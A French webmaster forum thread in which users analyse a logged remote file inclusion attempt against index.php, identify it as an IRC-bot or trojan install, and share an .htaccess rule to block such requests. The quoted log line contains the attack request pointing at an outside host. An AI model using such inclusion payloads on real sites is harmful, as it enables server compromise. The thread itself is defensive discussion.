Un p'tit malin...

[csseur]

Hello,

Je viens de découvrir dans mes logs des choses comme:

88.191.36.35 - - [03/Mar/2008:23:14:27 +0100] "GET //index.php?Base=http://svchost25.site.voila.fr/alls.txt?? HTTP/1.1" 403 211 "-" "libwww-perl/5.803"

Qu'a t'il voulu faire exactement avec son fichier alls.txt ?

Aucuns risques si allow_url_fopen est désactivé ?

++

 

[biddybulle]

installer un serveur IRC

 

[capleton59]

oui c'est clairement une tentative de piratage :twisted:

 

[Leonick]

préviens voila pour qu'ils suppriment le compte

 

[Hartas]

je confirme l'irc. D'ailleurs en ouvrant -http://svchost25.site.voila.fr/404.txt j'ai McAfee qui s'est excité ->cheval de troie

question bête pourquoi faire un piratage pour installer un serveur IRC ? L'intérêt n'est-il qu'au niveau du DL de fichier "tipiak", ou "la vérité est ailleurs"? :lol:

 

[csseur]

J'ai contacté voila (là ou ya la page), dédibox (la machine avec laquelle il appelle le script) et wordpress.com (monsieur a un blog sur lequel il montre des hacks screenshots à l'appui..).

Je sais qu'il y en a des milliers comme lui, mais bon

Sinon, existe-t'il un script pour être averti par email en temps réel de certaines requêtes? (vec apache2/linux) ?

++

 

[darkjukka]

J'en reçois pas mal par jours des tentatives de ce genre sur mon site, à croire que les gens ont que ça à foutre :roll:

M'enfin vu que je suis averti des 404 je vois ce que ces petits malins essaye de faire (si je prenais le temps, je boquerais les IP tiens ^^)

 

[Leonick]

si tu n'utilises pas ce type d'url, inclusions externes, il suffit de les bloquer avec htaccess

RewriteEngine on
RewriteRule (_vti_bin|http) - [NC,F,L]

et plus ce genre de problèmes :twisted: